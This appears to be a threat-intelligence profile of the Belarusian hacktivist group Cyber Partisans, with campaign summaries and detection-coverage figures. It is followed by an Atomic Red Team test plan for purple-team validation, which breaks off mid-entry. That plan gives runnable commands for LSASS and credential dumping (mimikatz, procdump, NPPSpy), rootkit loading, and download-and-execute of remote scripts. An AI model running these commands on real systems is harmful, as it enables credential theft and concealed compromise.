cyber_partisans · threatengine.sh

Home/Threat Actor/Cyber Partisans

Threat Actor

Cyber Partisans

cyber_partisans · belarus_opposition · active since 2020-09

Cyber Partisans (canonical English naming, also Kiberpartyzany Belarusian + Kiberpartizany Russian romanizations of Кіберпартызаны / Киберпартизаны) is a Belarusian decentralized anonymous hacktivist collective that emerged September 2020 in response to the disputed 2020 Belarusian presidential election and subsequent protests against Alexander Lukashenko's regime brutally suppressed by government police + security forces.

Belarusian opposition diaspora attribution with ~30 core members + ~80 total volunteers operating from exile in Lithuania + Poland + EU per Binding Hook + New Eastern Europe + Wikipedia + Bloomberg + MIT Technology Review canonical interviews + The Record / Recorded Future News + Cyberscoop + Govinfosecurity + CEPA April 2024 + Belarus Partisan 2025 + Yuliana Shemetovets canonical public-facing spokesperson media presence + Pascal Geenens Radware sophistication assessment + Gabriella Coleman McGill University hacktivism expert commentary.

standalone cluster paralleling predatory_sparrow + it_army_ukraine + ghostsec in v0.1.157 2020-2025 hacktivist collectives in geopolitical conflict zones cell.

operational target profile Belarusian government primary target with Belarusian Railways (January 2022 pre-invasion Russian troop transport disruption + February 2022 second attack) + Ministry of Internal Affairs (comprehensive passport database + DMV + HR + operational drone footage + phone wiretapping database breach) + KGB (informants + officers identified) + state news media (All- National TV + Belarus-1 defaced with police brutality video streaming) + Belaruskali state- owned company + Academy of Public Administration + Mogilevtransmash + Russian military secondary target post-2022 (Orlan drone manufacturer sharing data with Ukrainian intelligence services + A-50 surveillance aircraft Machulishchy air base sabotage + Roskomnadzor General Radio Frequency Centre infiltration)

operational attack architecture: (1) cluster-defining specially- created Belarusian Railways ransomware January 2022 ("The group used a modified form of ransomware to paralyze the railway system, saying that it would return to computer network to normal if the Belarusian government released 50 political prisoners in need of medical treatment and stopped Russian forces from entering Belarus") exploiting Windows XP outdated OS + targeting freight rail to disrupt Russian military movements while deliberately avoiding passenger rail consistent with ethical-hacking principle.

(2) cluster-defining comprehensive state database extraction tradecraft with MOI passport database containing personal details of every Belarusian citizen including top government officials + special agents + spies, DMV database, MOI HR database, operational drone footage from protests, mobile phone wiretapping database + verification via publishing Lukashenko + sons passport data; (3) cluster-defining state news media defacement + police brutality video streaming September 2020 symbolic operations.

(4) signature COVID-19 excess mortality data leak with 32,000 deaths 14.4x official figure exposure 2021.

(5) signature sabotage support operations with 2023 A-50 Russian surveillance aircraft Machulishchy air base.

(6) cluster-defining Ukrainian intelligence services cooperation with Orlan drone manufacturer data sharing + Kalinousky Regiment Belarusian-volunteers-in-Ukrainian-armed- forces technical assistance + Ukraine IT Army operational overlap.

(7) cluster-defining ethical hacking principle signature ("only against the state and do not harm to ordinary citizens" + deliberately avoiding passenger rail + avoiding automation/security systems with safety concerns)

(8) cluster-defining "Inferno" / "Scorching Heat" named-operation tradecraft November 2021 with Academy of Public Administration + Belaruskali.

(9) cluster- defining December 2021 Mogilevtransmash ransomware with 10-political-prisoner-release demand establishing ransomware-with-political-demands pattern preceding Belarusian Railways.

(10) signature Belarusian Supreme Court + Ministry of Internal Affairs 2021 declaration of Cyber- Partizans + Cyber-Leaks + Telegram channels as "extremist" group + "terrorist organization" criminalizing participation demonstrating state legal recognition of operational impact.

(11) signature Yuliana Shemetovets canonical public- facing spokesperson media presence with extensive Bloomberg + MIT Technology Review + ISMG + Lazo Magazine interviews providing operational continuity + international visibility unusual for hacktivist collectives.

cluster fills the September-2020-onward-Belarusian-opposition- hacktivism + specially-created-Belarusian- Railways-ransomware-political-demands + KGB- informant-MOI-passport-database-leaks + Russian- Orlan-drone-A-50-aircraft-sabotage + Ukrainian- intelligence-cooperation + ethical-hacking- against-state-only-signature + Yuliana-Shemetovets- public-spokesperson position in 2020-2025 hacktivist collectives in geopolitical conflict zones cell.

canonical illustration of sophisticated state-targeted Eastern European hacktivism + ransomware-with-political-demands tradecraft + ethical-hacking-against-state-only principle + state legal recognition (Belarusian Supreme Court extremist designation) + foreign intelligence services cooperation evolution + sabotage support operations cited in essentially all subsequent Eastern European hacktivism industry analyses through 2020-2026 period.

belarus_opposition confidence: high 22 aliases

Sigma rules200 YARA rules0 Live IOCs0 CVEs exploited0

⬢

Profile

Cyber Partisans (canonical English naming, also Kiberpartyzany Belarusian + Kiberpartizany Russian romanizations) is a Belarusian decentralized anonymous hacktivist collective that emerged September 2020 in response to the disputed 2020 Belarusian presidential election + subsequent protests against Alexander Lukashenko's regime brutally suppressed by government security forces. Belarusian opposition diaspora attribution, ~30 core members + ~80 total volunteers operating from exile in Lithuania + Poland + EU per Binding Hook + New Eastern Europe. Per Wikipedia + Bloomberg + MIT Technology Review canonical interviews.

Yuliana Shemetovets public-facing spokesperson. Standalone cluster paralleling predatory_sparrow + it_army_ukraine + ghostsec in v0.1.157 2020-2025 hacktivist collectives in geopolitical conflict zones cell.

Operational target profile

Belarusian government primary: Railways + MOI + KGB + state news media + state enterprises + Academy of Public Administration.
Russian military + supporting secondary post-2022: Orlan drones + A-50 surveillance aircraft + Roskomnadzor GRFC Operational attack architecture: (1) Specially-created Belarusian Railways ransomware (cluster-defining): January 2022 attack on Windows XP outdated OS with political demands (50 political prisoners + Russian troop withdrawal) (2) State database extraction tradecraft (cluster-defining): MOI passport database + DMV + HR + KGB informants + operational drone footage + phone wiretapping database, comprehensive state-data exfiltration with verification publication (3) State news media defacement + video streaming (signature): All-National TV + Belarus-1 with police brutality videos (4) Sabotage support operations (signature): A-50 surveillance aircraft at Machulishchy air base 2023 (5) Ukrainian intelligence services cooperation (cluster-defining): Orlan drone manufacturer data shared with Ukraine + Kalinousky Regiment technical assistance (6) Ethical hacking principle (cluster-defining): "only against the state and do not harm to ordinary citizens" + deliberately avoiding passenger rail in Belarusian Railways attack (7) Yuliana Shemetovets spokesperson public- facing media presence (signature): distinctive tradecraft providing operational continuity + international visibility (8) Belarusian Supreme Court extremist + terrorist designation (signature): 2021 state legal recognition of operational impact The cluster fills the September-2020-onward- Belarusian-opposition-hacktivism + specially- created-Belarusian-Railways-ransomware-political- demands + KGB-informant-MOI-passport-database- leaks + Russian-Orlan-drone-A-50-aircraft-sabotage + Ukrainian-intelligence-cooperation + ethical- hacking-against-state-only-signature + Yuliana- Shemetovets-public-spokesperson position in 2020-2025 hacktivist collectives in geopolitical conflict zones cell.

☉

Aliases

cyber_partisanscyber partisanscyber-partisansbelarusian_cyber_partisansbelarusian cyber-partisansbelarusian cyber partisanskiberpartyzanykiberpartizanyкіберпартызаныкиберпартизаныcpartisanscyber partisans september 2020 emergence belarusian oppositioncyber partisans january 2022 belarusian railways ransomwarecyber partisans yuliana shemetovets spokespersoncyber partisans kgb informant database leakcyber partisans ministry of internal affairs passport database breachcyber partisans russian orlan drone manufacturer hack ukrainian intelligencecyber partisans a-50 surveillance aircraft machulishchy air base sabotagecyber partisans ethical hacking against state only signaturecyber partisans extremist terrorist designation belarusian supreme court 2021cyber partisans inferno scorching heat operation belaruskalicyber partisans cyber-leaks subsidiary project

⌖

Notable Campaigns

2023-2024Cyber Partisans Russian Orlan Drone Manufacturer Hack, Ukrainian Intelligence Sharing
2023Cyber Partisans A-50 Russian Surveillance Aircraft Machulishchy Air Base Sabotage (2023)
2022Cyber Partisans Belarusian Railways January 2022 Ransomware Attack, Russian Troop Movement Disruption
2022Cyber Partisans Roskomnadzor GRFC General Radio Frequency Centre Infiltration
2021Cyber Partisans Major Database Leaks, KGB + MOI + Passport (2021)
2021Cyber Partisans COVID-19 Excess Mortality Data Leak (2021)
2021Belarusian Supreme Court Extremist + Terrorist Organization Designation (2021)
2021Cyber Partisans 'Inferno' / 'Scorching Heat' Operation (November 2021)
2021Cyber Partisans Mogilevtransmash December 2021 Ransomware Attack (Pre-Railways)
2020-2026Continued Industry Reference Status (2020-2026)
2020Cyber Partisans Origin, September 2020 Post-Election Emergence

★

Attribution & Reporting

Attributed by

Wikipedia (canonical longstanding 2020-2025 tracking with Belarusian + Russian language naming + operational timeline)Bloomberg (canonical August 2021 first major interview + group details disclosure)MIT Technology Review (canonical anonymous spokesperson interview)The Record / Recorded Future News (canonical January 2022 Belarusian Railways coverage + 30-member-2022 estimate)Cyberscoop (canonical January 2022 + February 2022 Belarusian Railways coverage)Bleeping Computer (canonical Belarusian Railways ransomware coverage)Govinfosecurity (canonical Hacktivists Hit Belarusian Railroad coverage)Yuliana Shemetovets (canonical Cyber Partisans spokesperson public-facing media interviews)CEPA (canonical April 2024 Belarus Cyber Partisans Prepare For Uprising analysis)New Eastern Europe (canonical May 2025 In the digital shadows Belarusian cyber partisans unnerve Lukashenka coverage)Binding Hook (canonical Belarusian Cyber Partisans' story with 30 core + 80 volunteers + 4 operational fronts analysis)Lazo Magazine (canonical February 2022 Yuliana Shemetovets interview)Belarus Partisan (canonical 2025 digital resistance retrospective)Pascal Geenens / Radware Director of Threat Intelligence (canonical sophistication assessment)Gabriella Coleman / McGill University (canonical anthropologist hacktivism expert commentary)Tetyana Lokot / Dublin City University (canonical Eastern European digital rights expert commentary)Vasileios Karagiannopoulos / University of Portsmouth (canonical modern hacktivism evolution assessment)David Kirichenko / Henry Jackson Society (canonical journalist coverage)

Key reporting

reportWikipedia: Cyber Partisans, canonical longstanding 2020-2025 tracking

reportBloomberg: August 2021 first major interview with Cyber Partisans

reportMIT Technology Review: anonymous spokesperson interview canonical

reportThe Record / Recorded Future News: Cyber Partisans hacktivists claim credit for cyberattack on Belarusian Railways (January 2022)

reportCyberscoop: Belarusian hackers launch another attack (January-February 2022)

reportGovinfosecurity: Hacktivists Hit Belarusian Railroad to Stop Russian Troops

reportCEPA: Belarus Cyber Partisans Prepare For Uprising (April 2024)

reportNew Eastern Europe: In the digital shadows Belarusian cyber partisans unnerve Lukashenka (May 2025)

reportBinding Hook: The Belarusian Cyber Partisans' story, 30 core + 80 volunteers + 4 operational fronts

reportLazo Magazine: February 2022 Yuliana Shemetovets interview

reportBelarus Partisan: Belarusian Partisans in 2025, Digital Resistance Against Lukashenko's Regime

reportPascal Geenens / Radware: canonical sophistication assessment

reportGabriella Coleman / McGill University: canonical anthropologist hacktivism expert commentary

reportYuliana Shemetovets: canonical Cyber Partisans spokesperson public-facing media presence

9 source links

https://en.wikipedia.org/wiki/Cyber_Partisans

https://cepa.org/article/belarus-cyber-partisans-prepare-for-uprising/

https://neweasterneurope.eu/2025/05/08/in-the-digital-shadows-belarusian-cyber-partisans-unnerve-lukashenka/

https://bindinghook.com/the-belarusian-cyber-partisans-story/

https://lazomagazine.com/cyber-partisans-meet-the-hacktivists-working-to-democratize-belarus/

https://cyberscoop.com/belarusian-hacktivists-launch-another-attack-russia-cyber-hacktivism/

https://therecord.media/cyber-partisans-hacktivists-claim-credit-for-cyberattack-on-belarusian-railways

https://belaruspartisan.org/en/politics/belarusian-partisans-in-2025/

https://www.govinfosecurity.com/hacktivists-hit-belarusian-railroad-to-stop-russian-troops-a-18378

⬡

Operational

State sponsor

Belarusian opposition diaspora, anti-Lukashenko regime hacktivist collective with broader Belarusian opposition movement alignment. Group affirmed 2021-2022 not collaborating with foreign government but "not against it, as long as it aligns with our depicted goals, to change the regime." Per The Binding Hook + New Eastern Europe: 30 core members + 80 volunteers operating from exile in Lithuania + Poland + EU countries. Per CEPA + Belarus Partisan: extended cooperation with Ukrainian special services since 2022 Russia-Ukraine war. Attribution chain: (1) Wikipedia canonical longstanding tracking: per Wikipedia: "Cyber Partisans (Belarusian: Кіберпартызаны, romanized: Kiberpartyzany, Russian: Киберпартизаны, romanized: Kiberpartizany) is a Belarusian decentralized anonymous hacktivist collective that emerged in September 2020, known for its cyber attacks against the governments of Belarus and Russia. The group is part of the broader Belarusian opposition movement." (2) Bloomberg + MIT Technology Review canonical first major coverage: per Wikipedia: "In an August 2021 interview to Bloomberg, hackers shared some details about themselves: they are 15 people, none of whom are professional hackers; of them, only 3 or 4 perform the hacks, others deal with the analysis of obtained data.

and some group members were penetration testers before joining the group. Members are anonymous even to each other. The group describes its activities as ethical hacking, as it goes only against the state and do not harm to ordinary citizens." Per anonymous spokesperson MIT Technology Review: "What we want is to stop the violence and repression from the terroristic regime in Belarus and to bring the country back to democratic principles and rule of law." (3) The Record / Recorded Future News + Bleeping Computer canonical January 2022 Belarusian Railways coverage: per The Record + Cyberscoop: Cyber Partisans claimed credit for January 24, 2022 cyberattack on Belarusian Railways. Per Cyber Partisans tweet: "We have encryption keys, and we are ready to return Belarusian Railroad's systems to normal mode. Our conditions: Release of the 50 political prisoners who are most in need of medical assistance. Preventing the presence of Russian troops on the territory of #Belarus." Cluster-defining ransomware-with- political-demands signature. (4) CEPA + New Eastern Europe canonical 2024- 2025 tracking with Ukrainian intelligence cooperation: per CEPA April 2024: "Since then, the Cyber Partisans have continued to relay important data to Ukrainian intelligence. They recently hacked into the Russian drone manufacturer 'Orlan,' transmitting company data to Ukraine's intelligence services. The Belarusian Cyber Partisans and Ukraine's IT Army efforts overlap." Per New Eastern Europe May 2025: "Notable operations include the 2022 hack of Belarusian Railways to disrupt Russian troop movements, a major data breach exposing KGB informants, and the sabotage of a Russian A-50 surveillance aircraft at Machulishchy air base." (5) Belarusian Supreme Court extremist designation 2021: per Wikipedia: "In 2021, the Belarusian government (through the Belarusian Supreme Court and Ministry of Internal Affairs) declared the information resources Cyber-Partizans, its subsidiary project Cyber-Leaks, and all their Telegram channels to be an 'extremist' group and a terrorist organization. Creating or participating in such a group is a crime in Belarus." (6) Pascal Geenens Radware Director of Threat Intelligence canonical assessment: per New Eastern Europe: "the Belarusian Cyber Partisans have evolved into one of the most sophisticated and focused hacktivist collectives in Eastern Europe. Formed in 2020 to challenge the Lukashenka regime, the group expanded its operations following Russia's invasion of Ukraine, turning their digital firepower against Russian military infrastructure and support networks. Geenens pointed out that unlike the broad, volunteer- based IT Army of Ukraine, the Cyber Partisans are a tightly knit and anonymous group, reportedly consisting of around 30 members in 2022." Operational mission objective: Anti-Lukashenko regime change via cyber operations (primary) + anti-Russian-military-support operations as auxiliary objective extending original anti-regime mission post-2022 Russia- Ukraine invasion. Ethical hacking principle ("only against the state and do not harm to ordinary citizens"). Cooperation with Ukrainian intelligence services + Belarusian Kalinousky Regiment in Ukrainian armed forces.

Operational target profile

Belarusian government primary target

Belarusian Railways (Jan/Feb 2022 disruption of Russian troop transport)
Ministry of Internal Affairs (passport database + DMV + HR + operational drone footage + phone wiretapping database)
KGB (informants + officers identified)
All-National TV + Belarus-1 (state news websites defaced + police brutality videos streamed)
Academy of Public Administration.
Belaruskali state-owned company.
Mogilevtransmash car company.

Russian military + supporting infrastructure

Orlan drone manufacturer 2023.
A-50 surveillance aircraft at Machulishchy air base 2023 sabotage.
Roskomnadzor / General Radio Frequency Centre (GRFC) infiltration The cluster fills the September-2020-onward- Belarusian-opposition-hacktivism + Belarusian- Railways-ransomware-political-demands + KGB- informant-MOI-passport-database-leaks + Russian- Orlan-drone-A-50-aircraft-sabotage + Belarusian- Supreme-Court-extremist-designation + ethical- hacking-against-state-only-signature position in 2020-2025 hacktivist collectives in geopolitical conflict zones cell.

Motivations

belarusian_anti_lukashenko_regime_change_objective_primary, russian_military_support_disruption_objective_secondary_post_2022, belarusian_political_prisoner_release_demand_signature, kgb_informant_exposure_human_rights_accountability_signature, ethical_hacking_only_against_state_signature_principle, ukrainian_intelligence_cooperation_objective_secondary

Sectors

belarusian_government_railways belarusian_ministry_of_internal_affairs belarusian_kgb_security_services belarusian_state_news_media belarusian_state_owned_enterprises belarusian_government_academy russian_drone_manufacturers russian_military_aircraft_facilities russian_censorship_authorities

Regions

belarus russia

◈

Detection Blind Spots

60 techniques

Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.

Behavioral / log (Sigma)56/60 · 93%

Analytics (MITRE CAR)33/60 · 55%

Runtime / container (Falco)8/60 · 13%

File / malware (YARA)0/60 · 0%

Network (Suricata/Snort)20/60 · 33%

Vuln scan (Nuclei)0/60 · 0%

▸

Atomic Test Plan

30 techniques

Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

T1003 OS Credential Dumping · 7 tests

command_promptelevatedwindowsGsecdump

"#{gsecdump_exe}" -a

powershellelevatedwindowsCredential Dumping with NPPSpy

Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"

powershellelevatedwindowsDump svchost.exe to gather RDP credentials

$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /config

powershellwindowsDump Credential Manager using keymgr.dll and rundll32.exe

rundll32.exe keymgr,KRShowKeyMgr

powershellwindowsSend NTLM Hash with RPC Test Connection

rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null

T1003.001 LSASS Memory · 14 tests

command_promptelevatedwindowsDump LSASS.exe Memory using ProcDump

"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}

powershellelevatedwindowsDump LSASS.exe Memory using comsvcs.dll

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full

command_promptelevatedwindowsDump LSASS.exe Memory using direct system calls and API unhooking

"#{dumpert_exe}"

command_promptelevatedwindowsDump LSASS.exe Memory using NanoDump

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"

manualwindowsDump LSASS.exe Memory using Windows Task Manager

command_promptelevatedwindowsOffline Credential Theft With Mimikatz

"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit

command_promptelevatedwindowsLSASS read with pypykatz

"#{venv_path}\Scripts\pypykatz" live lsa

powershellelevatedwindowsDump LSASS.exe Memory using Out-Minidump.ps1

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump

command_promptelevatedwindowsCreate Mini Dump of LSASS.exe using ProcDump

"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}

powershellelevatedwindowsPowershell Mimikatz

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds

powershellelevatedwindowsDump LSASS with createdump.exe from .Net v5

$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id

powershellelevatedwindowsDump LSASS.exe using imported Microsoft DLLs

#{xordump_exe} -out #{output_file} -x 0x41

powershellelevatedwindowsDump LSASS.exe using lolbin rdrleakdiag.exe

if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."

command_promptelevatedwindowsDump LSASS.exe Memory through Silent Process Exit

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"

T1005 Data from Local System · 3 tests

powershellwindowsSearch files of interest and save them to a single zip file (Windows)

$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }

bashlinuxFind and dump sqlite databases (Linux)

cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;

shmacosCopy Apple Notes database files using AppleScript

osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'

T1010 Application Window Discovery · 1 test

command_promptwindowsList Process Main Windows - C# .NET

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}

T1014 Rootkit · 4 tests

shelevatedlinuxLoadable Kernel Module based Rootkit

sudo insmod #{rootkit_path}/#{rootkit_name}.ko

shelevatedlinuxLoadable Kernel Module based Rootkit

sudo modprobe #{rootkit_name}

shelevatedlinuxdynamic-linker based rootkit (libprocesshider)

echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"

shelevatedlinuxLoadable Kernel Module based Rootkit (Diamorphine)

sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"

T1016 System Network Configuration Discovery · 9 tests

command_promptwindowsSystem Network Configuration Discovery on Windows

ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config

command_promptwindowsList Windows Firewall Rules

netsh advfirewall firewall show rule name=all

shmacos, linuxSystem Network Configuration Discovery

if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;

command_promptwindowsSystem Network Configuration Discovery (TrickBot Style)

ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts

powershellwindowsList Open Egress Ports

$ports = Get-content "#{port_file}"
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
    $test = new-object system.Net.Sockets.TcpClient
    $wait = $test.beginConnect("allports.exposed", $port, $null, $null)
    $wait.asyncwaithandle.waitone(250, $false) | Out-Null
    $totalports++ | Out-Null
    if ($test.Connected) {
        $result = "$port open" 
        Write-Host -ForegroundColor Green $result
        $result | Out-File -Encoding ASCII -append $file
        $totalopen++ | Out-Null
    }
    else {
        $result = "$port closed" 
        Write-Host -ForegroundColor Red $result
        $totalclosed++ | Out-Null
        $result | Out-File -Encoding ASCII -append $file
    }
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results

command_promptwindowsAdfind - Enumerate Active Directory Subnet Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}

command_promptwindowsQakbot Recon

"#{recon_commands}"

bashelevatedmacosList macOS Firewall Rules

sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate

command_promptwindowsDNS Server Discovery Using nslookup

nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%

T1018 Remote System Discovery · 22 tests

command_promptwindowsRemote System Discovery - net

net view /domain
net view

command_promptwindowsRemote System Discovery - net group Domain Computers

net group "Domain Computers" /domain

command_promptwindowsRemote System Discovery - nltest

nltest.exe /dclist:#{target_domain}

command_promptwindowsRemote System Discovery - ping sweep

for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i

command_promptwindowsRemote System Discovery - arp

arp -a

shlinux, macosRemote System Discovery - arp nix

arp -a | grep -v '^?'

shlinux, macosRemote System Discovery - sweep

for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done

powershellelevatedwindowsRemote System Discovery - nslookup

$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}

command_promptelevatedwindowsRemote System Discovery - adidnsdump

"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}

command_promptwindowsAdfind - Enumerate Active Directory Computer Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}

command_promptwindowsAdfind - Enumerate Active Directory Domain Controller Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist

shlinuxRemote System Discovery - ip neighbour

ip neighbour show

shlinuxRemote System Discovery - ip route

ip route show

shlinuxRemote System Discovery - netstat

netstat -r | grep default

shlinuxRemote System Discovery - ip tcp_metrics

ip tcp_metrics show |grep --invert-match "^127\."

powershellwindowsEnumerate domain computers within Active Directory using DirectorySearcher

$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}

powershellwindowsEnumerate Active Directory Computers with Get-AdComputer

Get-AdComputer -Filter *

powershellwindowsEnumerate Active Directory Computers with ADSISearcher

([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()

powershellwindowsGet-DomainController with PowerView

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose

powershellwindowsGet-WmiObject to Enumerate Domain Controllers

try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }

command_promptwindowsRemote System Discovery - net group Domain Controller

net group /domain "Domain controllers"

powershellwindowsEnumerate Remote Hosts with Netscan

